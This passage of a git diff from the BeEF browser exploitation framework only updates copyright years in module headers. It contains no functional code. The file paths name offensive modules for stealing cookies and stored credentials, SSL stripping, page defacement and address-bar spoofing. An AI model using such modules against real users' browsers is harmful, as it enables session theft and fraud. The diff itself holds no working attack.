+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/detect_popup_blocker/module.rb b/modules/browser/detect_popup_blocker/module.rb
index 285d69ebe..a86d719b8 100644
--- a/modules/browser/detect_popup_blocker/module.rb
+++ b/modules/browser/detect_popup_blocker/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/detect_unsafe_activex/command.js b/modules/browser/detect_unsafe_activex/command.js
index cae5083bf..988fb79cd 100644
--- a/modules/browser/detect_unsafe_activex/command.js
+++ b/modules/browser/detect_unsafe_activex/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/detect_unsafe_activex/config.yaml b/modules/browser/detect_unsafe_activex/config.yaml
index a64fe7fcf..71c4c8b80 100644
--- a/modules/browser/detect_unsafe_activex/config.yaml
+++ b/modules/browser/detect_unsafe_activex/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/detect_unsafe_activex/module.rb b/modules/browser/detect_unsafe_activex/module.rb
index 5504ceec2..8b3d38067 100644
--- a/modules/browser/detect_unsafe_activex/module.rb
+++ b/modules/browser/detect_unsafe_activex/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/get_visited_domains/command.js b/modules/browser/get_visited_domains/command.js
index 7e55b8b8c..9405ebbe3 100644
--- a/modules/browser/get_visited_domains/command.js
+++ b/modules/browser/get_visited_domains/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/get_visited_domains/config.yaml b/modules/browser/get_visited_domains/config.yaml
index b552f4e10..97879eefe 100644
--- a/modules/browser/get_visited_domains/config.yaml
+++ b/modules/browser/get_visited_domains/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/get_visited_domains/module.rb b/modules/browser/get_visited_domains/module.rb
index 206e41243..aeb5815f9 100644
--- a/modules/browser/get_visited_domains/module.rb
+++ b/modules/browser/get_visited_domains/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/get_visited_urls/command.js b/modules/browser/get_visited_urls/command.js
index a31bfe665..452f3323d 100644
--- a/modules/browser/get_visited_urls/command.js
+++ b/modules/browser/get_visited_urls/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/get_visited_urls/config.yaml b/modules/browser/get_visited_urls/config.yaml
index 81363c1ae..dbdf3cc8f 100644
--- a/modules/browser/get_visited_urls/config.yaml
+++ b/modules/browser/get_visited_urls/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/get_visited_urls/module.rb b/modules/browser/get_visited_urls/module.rb
index 4454023e6..1daed6adc 100644
--- a/modules/browser/get_visited_urls/module.rb
+++ b/modules/browser/get_visited_urls/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/ajax_fingerprint/command.js b/modules/browser/hooked_domain/ajax_fingerprint/command.js
index 5fb2bf6c3..c1455a2c1 100644
--- a/modules/browser/hooked_domain/ajax_fingerprint/command.js
+++ b/modules/browser/hooked_domain/ajax_fingerprint/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml
index 1458ac7ae..0b8fbf6c7 100644
--- a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml
+++ b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/ajax_fingerprint/module.rb b/modules/browser/hooked_domain/ajax_fingerprint/module.rb
index 68227c438..2b26bf22d 100644
--- a/modules/browser/hooked_domain/ajax_fingerprint/module.rb
+++ b/modules/browser/hooked_domain/ajax_fingerprint/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/alert_dialog/command.js b/modules/browser/hooked_domain/alert_dialog/command.js
index 81d57d9e7..0b6c6b04a 100644
--- a/modules/browser/hooked_domain/alert_dialog/command.js
+++ b/modules/browser/hooked_domain/alert_dialog/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/alert_dialog/config.yaml b/modules/browser/hooked_domain/alert_dialog/config.yaml
index 2ff2ea2d0..11d00f6d5 100644
--- a/modules/browser/hooked_domain/alert_dialog/config.yaml
+++ b/modules/browser/hooked_domain/alert_dialog/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/alert_dialog/module.rb b/modules/browser/hooked_domain/alert_dialog/module.rb
index b4eea8e80..f44875134 100644
--- a/modules/browser/hooked_domain/alert_dialog/module.rb
+++ b/modules/browser/hooked_domain/alert_dialog/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/deface_web_page/command.js b/modules/browser/hooked_domain/deface_web_page/command.js
index b78cce34d..f88ae2789 100644
--- a/modules/browser/hooked_domain/deface_web_page/command.js
+++ b/modules/browser/hooked_domain/deface_web_page/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/deface_web_page/config.yaml b/modules/browser/hooked_domain/deface_web_page/config.yaml
index ff51d8082..6d00b21a2 100644
--- a/modules/browser/hooked_domain/deface_web_page/config.yaml
+++ b/modules/browser/hooked_domain/deface_web_page/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/deface_web_page/module.rb b/modules/browser/hooked_domain/deface_web_page/module.rb
index e05b14404..2965cb776 100644
--- a/modules/browser/hooked_domain/deface_web_page/module.rb
+++ b/modules/browser/hooked_domain/deface_web_page/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/get_cookie/command.js b/modules/browser/hooked_domain/get_cookie/command.js
index 93ae9ec01..f065aabd7 100644
--- a/modules/browser/hooked_domain/get_cookie/command.js
+++ b/modules/browser/hooked_domain/get_cookie/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/get_cookie/config.yaml b/modules/browser/hooked_domain/get_cookie/config.yaml
index f63a389dd..be0f8df4a 100644
--- a/modules/browser/hooked_domain/get_cookie/config.yaml
+++ b/modules/browser/hooked_domain/get_cookie/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/get_cookie/module.rb b/modules/browser/hooked_domain/get_cookie/module.rb
index 81061bc89..2258f6ee8 100644
--- a/modules/browser/hooked_domain/get_cookie/module.rb
+++ b/modules/browser/hooked_domain/get_cookie/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/get_local_storage/command.js b/modules/browser/hooked_domain/get_local_storage/command.js
index 47ed1855b..4afe34f02 100644
--- a/modules/browser/hooked_domain/get_local_storage/command.js
+++ b/modules/browser/hooked_domain/get_local_storage/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/get_local_storage/config.yaml b/modules/browser/hooked_domain/get_local_storage/config.yaml
index 00e8e7f37..63443164f 100644
--- a/modules/browser/hooked_domain/get_local_storage/config.yaml
+++ b/modules/browser/hooked_domain/get_local_storage/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/get_local_storage/module.rb b/modules/browser/hooked_domain/get_local_storage/module.rb
index c65b063c0..30a106a4d 100644
--- a/modules/browser/hooked_domain/get_local_storage/module.rb
+++ b/modules/browser/hooked_domain/get_local_storage/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/get_page_html/command.js b/modules/browser/hooked_domain/get_page_html/command.js
index 2151880a2..b13096594 100644
--- a/modules/browser/hooked_domain/get_page_html/command.js
+++ b/modules/browser/hooked_domain/get_page_html/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/get_page_html/config.yaml b/modules/browser/hooked_domain/get_page_html/config.yaml
index 0f86badae..dd6877bd5 100644
--- a/modules/browser/hooked_domain/get_page_html/config.yaml
+++ b/modules/browser/hooked_domain/get_page_html/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/get_page_html/module.rb b/modules/browser/hooked_domain/get_page_html/module.rb
index 2d2eecac8..fb8062273 100644
--- a/modules/browser/hooked_domain/get_page_html/module.rb
+++ b/modules/browser/hooked_domain/get_page_html/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/get_page_links/command.js b/modules/browser/hooked_domain/get_page_links/command.js
index 0af4ca888..fa5815509 100644
--- a/modules/browser/hooked_domain/get_page_links/command.js
+++ b/modules/browser/hooked_domain/get_page_links/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/get_page_links/config.yaml b/modules/browser/hooked_domain/get_page_links/config.yaml
index d316522a2..d44374f5b 100644
--- a/modules/browser/hooked_domain/get_page_links/config.yaml
+++ b/modules/browser/hooked_domain/get_page_links/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/get_page_links/module.rb b/modules/browser/hooked_domain/get_page_links/module.rb
index 66c639ebd..b3b590789 100644
--- a/modules/browser/hooked_domain/get_page_links/module.rb
+++ b/modules/browser/hooked_domain/get_page_links/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/get_session_storage/command.js b/modules/browser/hooked_domain/get_session_storage/command.js
index 13346737e..81af92058 100644
--- a/modules/browser/hooked_domain/get_session_storage/command.js
+++ b/modules/browser/hooked_domain/get_session_storage/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/get_session_storage/config.yaml b/modules/browser/hooked_domain/get_session_storage/config.yaml
index 5f54cb91c..0f71a6e1d 100644
--- a/modules/browser/hooked_domain/get_session_storage/config.yaml
+++ b/modules/browser/hooked_domain/get_session_storage/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/get_session_storage/module.rb b/modules/browser/hooked_domain/get_session_storage/module.rb
index 40a196ae8..3e3aca5b3 100644
--- a/modules/browser/hooked_domain/get_session_storage/module.rb
+++ b/modules/browser/hooked_domain/get_session_storage/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/get_stored_credentials/command.js b/modules/browser/hooked_domain/get_stored_credentials/command.js
index 080b4e49e..be1336bb7 100644
--- a/modules/browser/hooked_domain/get_stored_credentials/command.js
+++ b/modules/browser/hooked_domain/get_stored_credentials/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/get_stored_credentials/config.yaml b/modules/browser/hooked_domain/get_stored_credentials/config.yaml
index f610c5fca..f1c281653 100644
--- a/modules/browser/hooked_domain/get_stored_credentials/config.yaml
+++ b/modules/browser/hooked_domain/get_stored_credentials/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/get_stored_credentials/module.rb b/modules/browser/hooked_domain/get_stored_credentials/module.rb
index 0e1277855..093ca44aa 100644
--- a/modules/browser/hooked_domain/get_stored_credentials/module.rb
+++ b/modules/browser/hooked_domain/get_stored_credentials/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/link_rewrite/command.js b/modules/browser/hooked_domain/link_rewrite/command.js
index 75702b158..66f493d88 100644
--- a/modules/browser/hooked_domain/link_rewrite/command.js
+++ b/modules/browser/hooked_domain/link_rewrite/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/link_rewrite/config.yaml b/modules/browser/hooked_domain/link_rewrite/config.yaml
index 5c5cbecf8..383b12195 100644
--- a/modules/browser/hooked_domain/link_rewrite/config.yaml
+++ b/modules/browser/hooked_domain/link_rewrite/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/link_rewrite/module.rb b/modules/browser/hooked_domain/link_rewrite/module.rb
index dabb6f189..963df3c51 100644
--- a/modules/browser/hooked_domain/link_rewrite/module.rb
+++ b/modules/browser/hooked_domain/link_rewrite/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js b/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js
index de3739f8d..ec429f747 100644
--- a/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js
+++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml
index 3ce3065b5..58767a163 100644
--- a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml
+++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb b/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb
index f7e32b6b7..983abce7a 100644
--- a/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb
+++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/command.js b/modules/browser/hooked_domain/link_rewrite_tel/command.js
index 355b7ec47..9af9ac86d 100644
--- a/modules/browser/hooked_domain/link_rewrite_tel/command.js
+++ b/modules/browser/hooked_domain/link_rewrite_tel/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/config.yaml b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml
index 54c7ef2d9..f0342e13f 100644
--- a/modules/browser/hooked_domain/link_rewrite_tel/config.yaml
+++ b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/module.rb b/modules/browser/hooked_domain/link_rewrite_tel/module.rb
index 58de13fb5..2df68f442 100644
--- a/modules/browser/hooked_domain/link_rewrite_tel/module.rb
+++ b/modules/browser/hooked_domain/link_rewrite_tel/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js b/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js
index 05d4a3354..2cbcdbdbc 100644
--- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js
+++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
index 72183d8b6..40a26eabe 100644
--- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
+++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb b/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb
index 5c35bc400..9ff774045 100644
--- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb
+++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/prompt_dialog/command.js b/modules/browser/hooked_domain/prompt_dialog/command.js
index 71c43e538..f16e51995 100644
--- a/modules/browser/hooked_domain/prompt_dialog/command.js
+++ b/modules/browser/hooked_domain/prompt_dialog/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/prompt_dialog/config.yaml b/modules/browser/hooked_domain/prompt_dialog/config.yaml
index def589af4..130ee546f 100644
--- a/modules/browser/hooked_domain/prompt_dialog/config.yaml
+++ b/modules/browser/hooked_domain/prompt_dialog/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/prompt_dialog/module.rb b/modules/browser/hooked_domain/prompt_dialog/module.rb
index 393cb35f5..462924549 100644
--- a/modules/browser/hooked_domain/prompt_dialog/module.rb
+++ b/modules/browser/hooked_domain/prompt_dialog/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/replace_video/command.js b/modules/browser/hooked_domain/replace_video/command.js
index 033fe3e12..1a0500be1 100644
--- a/modules/browser/hooked_domain/replace_video/command.js
+++ b/modules/browser/hooked_domain/replace_video/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/replace_video/config.yaml b/modules/browser/hooked_domain/replace_video/config.yaml
index 8c88b92b4..d70a42b1f 100644
--- a/modules/browser/hooked_domain/replace_video/config.yaml
+++ b/modules/browser/hooked_domain/replace_video/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
